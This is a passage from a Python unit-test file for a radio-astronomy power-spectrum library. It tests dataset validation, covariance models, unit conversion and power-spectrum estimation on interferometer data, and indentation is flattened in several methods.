# swapped without changing the matrix. This is secretly the
# same test as the symmetry test, but perhaps there are
# creative ways to break the code to break one test but not
# the other.
G_swapped = self.ds.get_G(key2, key1)
G_diff_norm = np.linalg.norm(G - G_swapped)
self.assertLessEqual(G_diff_norm,
matrix_scale * multiplicative_tolerance)
min_diagonal = np.min(np.diagonal(G))
# Test that all elements of G are positive up to numerical
# noise with the threshold set to 10 orders of magnitude
# down from the smallest value on the diagonal
for i in range(Nfreq-2):
for j in range(Nfreq-2):
self.assertGreaterEqual(G[i,j],
-min_diagonal * multiplicative_tolerance)
else:
# In general, when R_1 != R_2, there is a more restricted
# symmetry where swapping R_1 and R_2 *and* taking the
# transpose gives the same result
#UPDATE: Taper now occurs after filter so this
#symmetry only holds when taper = 'none'.
if taper_selection == 'none':
G_swapped = self.ds.get_G(key2, key1)
G_diff_norm = np.linalg.norm(G - G_swapped.T)
self.assertLessEqual(G_diff_norm,
matrix_scale * multiplicative_tolerance)
"""
Under Construction
def test_parseval(self):
# Test that output power spectrum respects Parseval's theorem.
np.random.seed(10)
variance_in = 1.
Nfreq = self.d[0].Nfreqs
data = self.d[0]
# Use only the requested number of channels
data.select(freq_chans=range(Nfreq), bls=[(24,24),])
# Make it so that the test data is unflagged everywhere
data.flag_array[:] = False
# Get list of available baselines and LSTs
bls = data.get_antpairs()
nlsts = data.Ntimes
# Simulate data given a Fourier-space power spectrum
pk = variance_in * np.ones(Nfreq)
# Make realisation of (complex) white noise in real space
g = 1.0 * np.random.normal(size=(nlsts,Nfreq)) \
+ 1.j * np.random.normal(size=(nlsts,Nfreq))
g /= np.sqrt(2.) # Since Re(C) = Im(C) = C/2
x = data.freq_array[0]
dx = x[1] - x[0]
# Fourier transform along freq. direction in each LST bin
gnew = np.zeros(g.shape).astype(complex)
fnew = np.zeros(g.shape).astype(complex)
for i in range(nlsts):
f = np.fft.fft(g[i]) * np.sqrt(pk)
fnew[i] = f
gnew[i] = np.fft.ifft(f)
# Parseval's theorem test: integral of F^2(k) dk = integral of f^2(x) dx
k = np.fft.fftshift( np.fft.fftfreq(Nfreq, d=(x[1]-x[0])) )
fsq = np.fft.fftshift( np.mean(fnew * fnew.conj(), axis=0) )
gsq = np.mean(gnew * gnew.conj(), axis=0)
# Realize set of Gaussian random datasets and pack into PSpecData
data.data_array = np.expand_dims(np.expand_dims(gnew, axis=1), axis=3)
ds = pspecdata.PSpecData()
ds.add([data, data], [None, None])
# Use true covariance instead
exact_cov = {
(0,24,24): np.eye(Nfreq),
(1,24,24): np.eye(Nfreq)
}
ds.set_C(exact_cov)
# Calculate OQE power spectrum using true covariance matrix
tau = np.fft.fftshift( ds.delays() )
ps, _ = ds.pspec(bls, input_data_weight='iC', norm='I')
ps_avg = np.fft.fftshift( np.mean(ps[0], axis=1) )
# Calculate integrals for Parseval's theorem
parseval_real = simps(gsq, x)
parseval_ft = dx**2. * simps(fsq, k)
parseval_phat = simps(ps_avg, tau)
# Report on results for different ways of calculating Parseval integrals
print "Parseval's theorem:"
print " \int [g(x)]^2 dx = %3.6e, %3.6e" % (parseval_real.real,
parseval_real.imag)
print " \int [f(k)]^2 dk = %3.6e, %3.6e" % (parseval_ft.real,
parseval_ft.imag)
print " \int p_hat(k) dk = %3.6e, %3.6e" % (parseval_phat.real,
parseval_phat.imag)
# Perform approx. equality test (this is a stochastic quantity, so we
# only expect equality to ~10^-2 to 10^-3
np.testing.assert_allclose(parseval_phat, parseval_real, rtol=1e-3)
"""
def test_scalar_delay_adjustment(self):
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, beam=self.bm)
key1 = (0, 24, 38)
key2 = (1, 25, 38)
# Test that when:
# i) Nfreqs = Ndlys, ii) Sampling, iii) No tapering, iv) R is identity
# are all satisfied, the scalar adjustment factor is unity
self.ds.set_weighting('identity')
self.ds.spw_Ndlys = self.ds.spw_Nfreqs
adjustment = self.ds.scalar_delay_adjustment(key1, key2, sampling=True)
self.assertAlmostEqual(adjustment, 1.0)
self.ds.set_weighting('iC')
#if weighting is not identity, then the adjustment should be a vector.
adjustment = self.ds.scalar_delay_adjustment(key1, key2, sampling=True)
self.assertTrue(len(adjustment) == self.ds.spw_Ndlys)
def test_scalar(self):
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, beam=self.bm)
gauss = pspecbeam.PSpecBeamGauss(0.8,
np.linspace(115e6, 130e6, 50, endpoint=False))
ds2 = pspecdata.PSpecData(dsets=self.d, wgts=self.w, beam=gauss)
# Check normal execution
scalar = self.ds.scalar(('xx','xx'))
scalar_xx = self.ds.scalar('xx') # Can use single pol string as shorthand
assert scalar == scalar_xx
scalar = self.ds.scalar(1515) # polpair-integer = ('xx', 'xx')
scalar = self.ds.scalar(('xx','xx'), taper_override='none')
scalar = self.ds.scalar(('xx','xx'), beam=gauss)
pytest.raises(NotImplementedError, self.ds.scalar, ('xx','yy'))
# Precomputed results in the following test were done "by hand"
# using iPython notebook "Scalar_dev2.ipynb" in the tests/ directory
# FIXME: Uncomment when pyuvdata support for this is ready
#scalar = self.ds.scalar()
#self.assertAlmostEqual(scalar, 3732415176.85 / 10.**9)
# FIXME: Remove this when pyuvdata support for the above is ready
#self.assertRaises(NotImplementedError, self.ds.scalar)
    def test_validate_datasets(self):
        """
        Test dataset validation: mismatched frequencies, times, labels,
        std datasets, weights, phasing, and channel widths must raise
        ValueError; compatible datasets must pass.
        """
        # test freq exception
        uvd = copy.deepcopy(self.d[0])
        uvd2 = uvd.select(frequencies=np.unique(uvd.freq_array)[:10],
                          inplace=False)
        ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
        pytest.raises(ValueError, ds.validate_datasets)
        # test time exception
        uvd2 = uvd.select(times=np.unique(uvd.time_array)[:10], inplace=False)
        ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
        pytest.raises(ValueError, ds.validate_datasets)
        # test label exception (restore original labels afterwards)
        _labels = ds.labels
        ds.labels = ds.labels[:1]
        pytest.raises(ValueError, ds.validate_datasets)
        ds.labels = _labels
        # test std exception (restore afterwards)
        _std = ds.dsets_std
        ds.dsets_std = ds.dsets_std[:1]
        pytest.raises(ValueError, ds.validate_datasets)
        ds.dsets_std = _std
        # test wgt exception (restore afterwards)
        _wgts = ds.wgts
        ds.wgts = ds.wgts[:1]
        pytest.raises(ValueError, ds.validate_datasets)
        ds.wgts = _wgts
        # test warnings: disjoint freq/time selections should validate
        uvd = copy.deepcopy(self.d[0])
        uvd2 = copy.deepcopy(self.d[0])
        uvd.select(frequencies=np.unique(uvd.freq_array)[:10],
                   times=np.unique(uvd.time_array)[:10])
        uvd2.select(frequencies=np.unique(uvd2.freq_array)[10:20],
                    times=np.unique(uvd2.time_array)[10:20])
        ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
        ds.validate_datasets()
        # test phasing: one phased dset + one drift dset must fail;
        # both phased must pass
        uvd = copy.deepcopy(self.d[0])
        uvd2 = copy.deepcopy(self.d[0])
        uvd.phase_to_time(Time(2458042, format='jd'))
        ds = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
        pytest.raises(ValueError, ds.validate_datasets)
        uvd2.phase_to_time(Time(2458042.5, format='jd'))
        ds.validate_datasets()
        # test polarization
        ds.validate_pol((0,1), ('xx', 'xx'))
        # test channel widths: mismatched widths must fail
        uvd2.channel_width *= 2.
        ds2 = pspecdata.PSpecData(dsets=[uvd, uvd2], wgts=[None, None])
        pytest.raises(ValueError, ds2.validate_datasets)
def test_rephase_to_dset(self):
# get uvd
uvd1 = copy.deepcopy(self.uvd)
# give the uvd an x_orientation to test x_orientation propagation
uvd1.x_orienation = 'east'
# null test: check nothing changes when dsets contain same UVData object
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd1), copy.deepcopy(uvd1)], wgts=[None, None])
# get normal pspec
bls = [(37, 39)]
uvp1 = ds.pspec(bls, bls, (0, 1), pols=('xx','xx'), verbose=False)
# rephase and get pspec
ds.rephase_to_dset(0)
uvp2 = ds.pspec(bls, bls, (0, 1), pols=('xx','xx'), verbose=False)
blp = (0, ((37,39),(37,39)), ('xx','xx'))
assert np.isclose(np.abs(uvp2.get_data(blp)/uvp1.get_data(blp)), 1.0).min()
    def test_Jy_to_mK(self):
        """
        Test in-place unit conversion of attached datasets from Jy to mK.
        """
        # test basic execution
        uvd = self.uvd
        uvd.vis_units = 'Jy'
        ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)],
                                 wgts=[None, None], beam=self.bm)
        ds.Jy_to_mK()
        assert ds.dsets[0].vis_units == 'mK'
        assert ds.dsets[1].vis_units == 'mK'
        # converted (mK) value should exceed the original Jy value, so the
        # ratio is < 1.
        # NOTE(review): this ratio is complex-typed; the `<` comparison relies
        # on numpy's ordering of complex scalars — confirm on current numpy.
        assert uvd.get_data(24, 25, 'xx')[30, 30] \
            / ds.dsets[0].get_data(24, 25, 'xx')[30, 30] < 1.0
        # test feeding beam: explicit beam argument must match the attached one
        ds2 = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)],
                                  wgts=[None, None], beam=self.bm)
        ds2.Jy_to_mK(beam=self.bm)
        assert ds.dsets[0] == ds2.dsets[0]
        # test vis_units no Jansky: non-Jy datasets are left untouched
        uvd2 = copy.deepcopy(uvd)
        uvd2.polarization_array[0] = -6
        uvd2.vis_units = 'UNCALIB'
        ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd2)],
                                 wgts=[None, None], beam=self.bm)
        ds.Jy_to_mK()
        assert ds.dsets[0].vis_units == "mK"
        assert ds.dsets[1].vis_units == "UNCALIB"
        assert ds.dsets[0].get_data(24, 25, 'xx')[30, 30] != ds.dsets[1].get_data(24, 25, 'yy')[30, 30]
    def test_trim_dset_lsts(self):
        """
        Test trimming of datasets onto their mutually overlapping LST range.
        """
        fname = os.path.join(DATA_PATH, "zen.2458042.17772.xx.HH.uvXA")
        uvd1 = UVData()
        uvd1.read_miriad(fname)
        uvd2 = copy.deepcopy(uvd1)
        # shift dset 2 by 10 integrations so only part of the LSTs overlap
        uvd2.lst_array = (uvd2.lst_array + 10. * np.median(np.diff(np.unique(uvd2.lst_array)))) % (2.*np.pi)
        # test basic execution: 60 times minus the 10-integration shift
        # leaves 50 overlapping times in each dataset
        ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd1), copy.deepcopy(uvd2)], wgts=[None, None])
        ds.trim_dset_lsts()
        assert ds.dsets[0].Ntimes == 50
        assert ds.dsets[1].Ntimes == 50
        assert np.all( (2458042.178948477 < ds.dsets[0].time_array) \
                      + (ds.dsets[0].time_array < 2458042.1843023109))
        # test exception: non-uniform LST spacing cannot be trimmed
        uvd2.lst_array += np.linspace(0, 1e-3, uvd2.Nblts)
        ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd1), copy.deepcopy(uvd2)], wgts=[None, None])
        pytest.raises(ValueError, ds.trim_dset_lsts)
        # datasets must be left untouched when trimming fails
        assert ds.dsets[0].Ntimes == 60
        assert ds.dsets[1].Ntimes == 60
def test_units(self):
ds = pspecdata.PSpecData()
# test exception
pytest.raises(IndexError, ds.units)
ds.add(self.uvd, None)
# test basic execution
vis_u, norm_u = ds.units(little_h=False)
vis_u, norm_u = ds.units()
assert vis_u == "UNCALIB"
assert norm_u == "Hz str [beam normalization not specified]"
ds_b = pspecdata.PSpecData(dsets=[self.uvd, self.uvd],
wgts=[None, None], beam=self.bm)
vis_u, norm_u = ds_b.units(little_h=False)
assert norm_u == "Mpc^3"
def test_delays(self):
ds = pspecdata.PSpecData()
# test exception
pytest.raises(IndexError, ds.delays)
ds.add([self.uvd, self.uvd], [None, None])
d = ds.delays()
assert len(d) == ds.dsets[0].Nfreqs
def test_check_in_dset(self):
# generate ds
uvd = copy.deepcopy(self.d[0])
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None])
# check for existing key
assert ds.check_key_in_dset(('xx'), 0)
assert ds.check_key_in_dset((24, 25), 0)
assert ds.check_key_in_dset((24, 25, 'xx'), 0)
# check for non-existing key
assert ds.check_key_in_dset('yy', 0) == False
assert ds.check_key_in_dset((24, 26), 0) == False
assert ds.check_key_in_dset((24, 26, 'yy'), 0) == False
# check exception
pytest.raises(KeyError, ds.check_key_in_dset, (1,2,3,4,5), 0)
# test dset_idx
pytest.raises(TypeError, ds.dset_idx, (1,2))
    def test_C_model(self):
        """
        Test the key format used in ds._C and the shape of stored covariance
        matrices for the 'empirical', 'autos' and 'known' models.
        """
        # test the key format in ds._C and the shape of stored covariance
        uvd = UVData()
        uvd.read(os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'))
        cosmo = conversions.Cosmo_Conversions()
        uvb = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, 'HERA_NF_dipole_power.beamfits'), cosmo=cosmo)
        ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=uvb)
        # two identical spectral windows over 160-165 MHz
        spws = utils.spw_range_from_freqs(uvd, freq_range=[(160e6, 165e6), (160e6, 165e6)], bounds_error=True)
        antpos, ants = uvd.get_ENU_antpos(pick_data_ants=True)
        antpos = dict(zip(ants, antpos))
        red_bls = redcal.get_pos_reds(antpos, bl_error_tol=1.0)
        bls1, bls2, blpairs = utils.construct_blpairs(red_bls[3], exclude_auto_bls=True, exclude_permutations=True)
        ds.set_spw(spws[0])
        key = (0,bls1[0],"xx")
        # 'empirical' model: stored with time_index None in the cache key
        ds.C_model(key, model='empirical', time_index=0)
        assert( ((0, 0), ((bls1[0][0],bls1[0][1] ,"xx"),(bls1[0][0],bls1[0][1] ,"xx")), 'empirical', None, False, True,) in ds._C.keys())
        # 'autos' model: per-time, so the requested time_index is kept
        ds.C_model(key, model='autos', time_index=0)
        assert( ((0, 0), ((bls1[0][0],bls1[0][1] ,"xx"), (bls1[0][0],bls1[0][1] ,"xx")), 'autos', 0, False, True,) in ds._C.keys())
        # every cached covariance must match the spw width
        for Ckey in ds._C.keys():
            assert ds._C[Ckey].shape == (spws[0][1]-spws[0][0], spws[0][1]-spws[0][0])
        ds.set_spw(spws[1])
        key = (0,bls1[0],"xx")
        known_cov = {}
        model = 'known'
        Ckey = ((0, 0), ((bls1[0][0],bls1[0][1] ,"xx"),(bls1[0][0],bls1[0][1] ,"xx")), 'known', 0, False, True,)
        known_cov[Ckey] = np.diag(np.ones(uvd.Nfreqs))
        # 'known' model: the user-supplied full-band covariance is stored
        # under Ckey with spw-width shape (per the assertion below)
        ds.C_model(key, model='known', time_index=0, known_cov=known_cov)
        assert ( Ckey in ds._C.keys())
        assert ds._C[Ckey].shape == (spws[1][1]-spws[1][0], spws[1][1]-spws[1][0])
    def test_get_analytic_covariance(self):
        """
        Test analytic covariance computation: outputs are effectively real,
        the optimized 'dsets' path agrees with the generic 'fiducial' path,
        and noise-dominated errorbars are statistically consistent with the
        scatter of the bandpowers.
        """
        uvd = UVData()
        uvd.read(os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'))
        uvd.nsample_array[:] = 1.0
        uvd.flag_array[:] = False
        cosmo = conversions.Cosmo_Conversions()
        uvb = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, 'HERA_NF_dipole_power.beamfits'), cosmo=cosmo)
        # extend time axis by factor of 4
        for i in range(2):
            new = copy.deepcopy(uvd)
            new.time_array += new.Ntimes * np.diff(np.unique(new.time_array))[0]
            new.lst_array = uvutils.get_lst_for_time(new.time_array, *new.telescope_location_lat_lon_alt_degrees)
            uvd += new
        # get redundant baselines
        reds, lens, angs = utils.get_reds(uvd, pick_data_ants=True)
        # append roughly 20 blpairs to a list
        bls1, bls2 = [], []
        for red in reds[:3]:
            _bls1, _bls2, _ = utils.construct_blpairs(red, exclude_auto_bls=False, exclude_cross_bls=False, exclude_permutations=False)
            bls1.extend(_bls1)
            bls2.extend(_bls2)
        # keep only 20 blpairs for speed (each with 40 independent time samples)
        bls1, bls2 = bls1[:20], bls2[:20]
        Nblpairs = len(bls1)
        # generate a sky and noise simulation: each bl has the same FG signal, constant in time
        # but has a different noise realization (different bl_loop_seed)
        np.random.seed(0)
        sim1 = testing.sky_noise_sim(uvd, uvb, cov_amp=1000, cov_length_scale=10, constant_per_bl=True,
                                     constant_in_time=True, bl_loop_seed=0, divide_by_nsamp=False)
        np.random.seed(0)
        sim2 = testing.sky_noise_sim(uvd, uvb, cov_amp=1000, cov_length_scale=10, constant_per_bl=True,
                                     constant_in_time=True, bl_loop_seed=1, divide_by_nsamp=False)
        # setup ds
        ds = pspecdata.PSpecData(dsets=[sim1, sim2], wgts=[None, None], beam=uvb)
        ds.Jy_to_mK()
        # assert that imag component of covariance is near zero
        key1 = (0, bls1[0], "xx")
        key2 = (1, bls2[0], "xx")
        ds.set_spw((60, 90))
        M_ = np.diag(np.ones(ds.spw_Ndlys))
        for model in ['autos', 'empirical']:
            (cov_q_real, cov_q_imag, cov_p_real,
             cov_p_imag) = ds.get_analytic_covariance(key1, key2, M=M_, exact_norm=False, pol=False,
                                                      model=model, known_cov=None)
            # assert these arrays are effectively real-valued, even though they are complex type.
            # some numerical noise can leak-in, so check to within a dynamic range of peak real power.
            for cov in [cov_q_real, cov_q_imag, cov_p_real, cov_p_imag]:
                assert np.isclose(cov.imag, 0, atol=abs(cov.real).max() / 1e10).all()
        # Here we generate a known_cov to be passed to ds.pspec, which stores two cov_models named 'dsets' and 'fiducial'.
        # The two models have actually the same data, while in generating output covariance, 'dsets' mode will follow the shorter
        # path where we use some optimization for diagonal matrices, while 'fiducial' mode will follow the longer path
        # where there is no such optimization. This test should show the results from two paths are equivalent.
        known_cov_test = dict()
        C_n_11 = np.diag([2.]*ds.Nfreqs)
        P_n_11, S_n_11, C_n_12, P_n_12, S_n_12 = np.zeros_like(C_n_11), np.zeros_like(C_n_11), np.zeros_like(C_n_11), np.zeros_like(C_n_11), np.zeros_like(C_n_11)
        models = ['dsets','fiducial']
        for model in models:
            for blpair in list(zip(bls1, bls2)):
                for time_index in range(ds.Ntimes):
                    key1 = (0,blpair[0],'xx')
                    dset1, bl1 = ds.parse_blkey(key1)
                    key2 = (1,blpair[1],'xx')
                    dset2, bl2 = ds.parse_blkey(key2)
                    # Ckey layout: ((dset_i, dset_j), (bl_i, bl_j), model,
                    # time_index, flag, flag) — the two trailing booleans
                    # presumably select which covariance variant (C/P/S) is
                    # stored; TODO confirm against C_model's key convention.
                    Ckey = ((dset1, dset1), (bl1,bl1), ) + (model, time_index, False, True,)
                    known_cov_test[Ckey] = C_n_11
                    Ckey = ((dset1, dset1), (bl1,bl1), ) + (model, time_index, False, False,)
                    known_cov_test[Ckey] = P_n_11
                    Ckey = ((dset1, dset1), (bl1,bl1), ) + (model, time_index, True, True,)
                    known_cov_test[Ckey] = S_n_11
                    Ckey = ((dset2, dset2), (bl2,bl2), ) + (model, time_index, False, True,)
                    known_cov_test[Ckey] = C_n_11
                    Ckey = ((dset2, dset2), (bl2,bl2), ) + (model, time_index, False, False,)
                    known_cov_test[Ckey] = P_n_11
                    Ckey = ((dset2, dset2), (bl2,bl2), ) + (model, time_index, True, True,)
                    known_cov_test[Ckey] = S_n_11
                    Ckey = ((dset1, dset2), (bl1,bl2), ) + (model, time_index, False, True,)
                    known_cov_test[Ckey] = C_n_12
                    Ckey = ((dset2, dset1), (bl2,bl1), ) + (model, time_index, False, True,)
                    known_cov_test[Ckey] = C_n_12
                    Ckey = ((dset2, dset1), (bl2,bl1), ) + (model, time_index, False, False,)
                    known_cov_test[Ckey] = P_n_12
                    Ckey = ((dset2, dset1), (bl2,bl1), ) + (model, time_index, True, True,)
                    known_cov_test[Ckey] = S_n_12
        uvp_dsets_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
                                 cov_model='dsets', known_cov=known_cov_test, verbose=False, taper='bh')
        uvp_fiducial_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
                                    cov_model='fiducial', known_cov=known_cov_test, verbose=False, taper='bh')
        # check their cov_array are equal
        assert np.allclose(uvp_dsets_cov.cov_array_real[0], uvp_fiducial_cov.cov_array_real[0], rtol=1e-05)
        # check noise floor computation from auto correlations
        uvp_auto_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
                                cov_model='autos', verbose=False, taper='bh')
        # get RMS of noise-dominated bandpowers for uvp_auto_cov
        noise_dlys = np.abs(uvp_auto_cov.get_dlys(0) * 1e9) > 1000
        rms = []
        for key in uvp_auto_cov.get_all_keys():
            rms.append(np.std(uvp_auto_cov.get_data(key).real \
                / np.sqrt(np.diagonal(uvp_auto_cov.get_cov(key).real, axis1=1, axis2=2)), axis=0))
        rms = np.mean(rms, axis=0)
        # assert this is close to 1.0 (errorbars match the scatter)
        assert np.isclose(np.mean(rms[noise_dlys]), 1.0, atol=0.1)
        # check signal + noise floor computation
        uvp_fgdep_cov = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=(60, 90), store_cov=True,
                                 cov_model='foreground_dependent', verbose=False, taper='bh')
        # get RMS of data: divisor is foreground_dependent covariance this time
        # b/c noise in empirically estimated fg-dep cov yields biased errorbar (tavg is not unbiased, but less-biased)
        rms = []
        for key in uvp_fgdep_cov.get_all_keys():
            rms.append(np.std(uvp_fgdep_cov.get_data(key)[:,~noise_dlys].real \
                / np.sqrt(np.mean(np.diagonal(uvp_fgdep_cov.get_cov(key).real, axis1=1, axis2=2)[:,~noise_dlys], axis=0)), axis=0))
        rms = np.mean(rms, axis=0)
        # assert this is close to 1.0
        assert np.isclose(np.mean(rms), 1.0, atol=0.1)
def test_pspec(self):
# generate ds
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None],beam=self.bm, labels=['red', 'blue'])
# check basic execution with baseline list
bls = [(24, 25), (37, 38), (38, 39), (52, 53)]
uvp = ds.pspec(bls, bls, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
assert len(uvp.bl_array) == len(bls)
assert (uvp.antnums_to_blpair(((24, 25), (24, 25))) in uvp.blpair_array)
assert uvp.data_array[0].dtype == np.complex128
assert uvp.data_array[0].shape == (240, 64, 1)
#test for different forms of input parameters
ds.pspec(bls, bls, (0, 1), ('xx','xx'), spw_ranges=(10,20))
ds.pspec(bls, bls, (0, 1), ('xx','xx'), n_dlys=10, spw_ranges=[(10,20)])
ds.pspec(bls, bls, (0, 1), ('xx','xx'), n_dlys=1)
my_r_params = {}
my_r_params_dset0_only = {}
rp = {'filter_centers':[0.],
'filter_half_widths':[250e-9],
'filter_factors':[1e-9]}
for bl in bls:
key1 = (0,) + bl + ('xx',)
key2 = (1,) + bl + ('xx',)
my_r_params[key1] = rp
my_r_params_dset0_only[key1] = rp
my_r_params[key2] = rp
#test inverse sinc weighting.
ds.pspec(bls,bls,(0, 1), ('xx','xx'),
spw_ranges = (10,20), input_data_weight = 'dayenu',
r_params = my_r_params)
#test value error
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), ('xx','xx'),
spw_ranges = (10,20), input_data_weight = 'dayenu', r_params = {})
#test value error no dset1 keys
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), ('xx','xx'),
spw_ranges = (10,20), input_data_weight = 'dayenu',
r_params = my_r_params_dset0_only)
#assert error if baselines are not provided in the right format
pytest.raises(NotImplementedError, ds.pspec, [[(24,25),(38,39)]],[[(24,25),(38,39)]],
(0,1),[('xx','xx')])
# compare the output of get_Q function with analytical estimates
ds_Q = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None],beam=self.bm_Q)
bls_Q = [(24, 25)]
uvp = ds_Q.pspec(bls_Q, bls_Q, (0, 1), [('xx', 'xx')], input_data_weight='identity',
norm='I', taper='none', verbose=True, exact_norm=False)
Q_sample = ds_Q.get_integral_beam('xx') #Get integral beam for pol 'xx'
assert np.shape(Q_sample) == (ds_Q.spw_range[1] - ds_Q.spw_range[0],\
ds_Q.spw_range[1] - ds_Q.spw_range[0]) #Check for the right shape
estimated_Q = (1.0/(4*np.pi)) * np.ones_like(Q_sample)
assert np.allclose(np.real(estimated_Q), np.real(Q_sample), rtol=1e-05)
#Test if the two pipelines match
ds_t = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm_Q)
uvp_new = ds_t.pspec(bls_Q, bls_Q, (0, 1), [('xx', 'xx')], input_data_weight='identity',
norm='I', taper='none', verbose=True, exact_norm=True)
uvp_ext = ds_t.pspec(bls_Q, bls_Q, (0, 1), [('xx', 'xx')], input_data_weight='identity',
norm='I', taper='none', verbose=True, exact_norm=False)
spw = 0
blp = (bls_Q[0], bls_Q[0])
key = (<KEY> 'xx')
power_real_new = (np.real(uvp_new.get_data(key)))
power_real_ext = (np.real(uvp_ext.get_data(key)))
diff = np.median((power_real_new-power_real_ext)/power_real_ext)
assert diff <= 0.05
# check with redundant baseline group list
antpos, ants = uvd.get_ENU_antpos(pick_data_ants=True)
antpos = dict(zip(ants, antpos))
red_bls = [sorted(blg) for blg in redcal.get_pos_reds(antpos)][2]
bls1, bls2, blps = utils.construct_blpairs(red_bls, exclude_permutations=True)
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
assert uvp.antnums_to_blpair(((24, 25), (37, 38))) in uvp.blpair_array
assert uvp.Nblpairs == 10
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
assert uvp.antnums_to_blpair(((24, 25), (52, 53))) in uvp.blpair_array
assert uvp.antnums_to_blpair(((52, 53), (24, 25))) not in uvp.blpair_array
assert uvp.Nblpairs == 10
# test mixed bl group and non blgroup, currently bl grouping of more than 1 blpair doesn't work
bls1 = [[(24, 25)], (52, 53)]
bls2 = [[(24, 25)], (52, 53)]
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=False)
# test select
red_bls = [(24, 25), (37, 38), (38, 39), (52, 53)]
bls1, bls2, blp = utils.construct_blpairs(red_bls, exclude_permutations=False, exclude_auto_bls=False)
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), spw_ranges=[(20,30), (30,40)], verbose=False)
assert uvp.Nblpairs == 16
assert uvp.Nspws == 2
uvp2 = uvp.select(spws=0, bls=[(24, 25)], only_pairs_in_bls=False, inplace=False)
assert uvp2.Nspws == 1
assert uvp2.Nblpairs == 7
uvp.select(spws=0, bls=(24, 25), only_pairs_in_bls=True, inplace=True)
assert uvp.Nspws == 1
assert uvp.Nblpairs == 1
# check w/ multiple spectral ranges
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), ('xx','xx'), spw_ranges=[(10, 24), (30, 40), (45, 64)], verbose=False)
assert uvp.Nspws == 3
assert uvp.Nspwdlys == 43
assert uvp.data_array[0].shape == (240, 14, 1)
assert uvp.get_data((0, 124125124125, ('xx','xx'))).shape == (60, 14)
uvp.select(spws=[1])
assert uvp.Nspws == 1
assert uvp.Ndlys == 10
assert len(uvp.data_array) == 1
# test polarization pairs
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), ('xx','xx'), spw_ranges=[(10, 24)], verbose=False)
#pytest.raises(NotImplementedError, ds.pspec, bls, bls, (0, 1), pols=[('xx','yy')])
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), [('xx','xx'), ('yy','yy')], spw_ranges=[(10, 24)], verbose=False)
uvd = copy.deepcopy(self.uvd)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), (-5, -5), spw_ranges=[(10, 24)], verbose=False)
# test exceptions
pytest.raises(AssertionError, ds.pspec, bls1[:1], bls2, (0, 1), ('xx','xx'))
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), pols=('yy','yy'))
uvd1 = copy.deepcopy(self.uvd)
uvd1.polarization_array = np.array([-6])
ds = pspecdata.PSpecData(dsets=[uvd, uvd1], wgts=[None, None], beam=self.bm)
pytest.raises(ValueError, ds.pspec, bls, bls, (0, 1), ('xx','xx'))
# test files with more than one polarizations
uvd1 = copy.deepcopy(self.uvd)
uvd1.polarization_array = np.array([-6])
uvd2 = self.uvd + uvd1
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), [('xx','xx'), ('yy','yy')], spw_ranges=[(10, 24)], verbose=False)
uvd1 = copy.deepcopy(self.uvd)
uvd1.polarization_array = np.array([-6])
uvd2 = self.uvd + uvd1
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp = ds.pspec(bls, bls, (0, 1), [('xx','xx'), ('xy','xy')], spw_ranges=[(10, 24)], verbose=False)
# test with nsamp set to zero
uvd = copy.deepcopy(self.uvd)
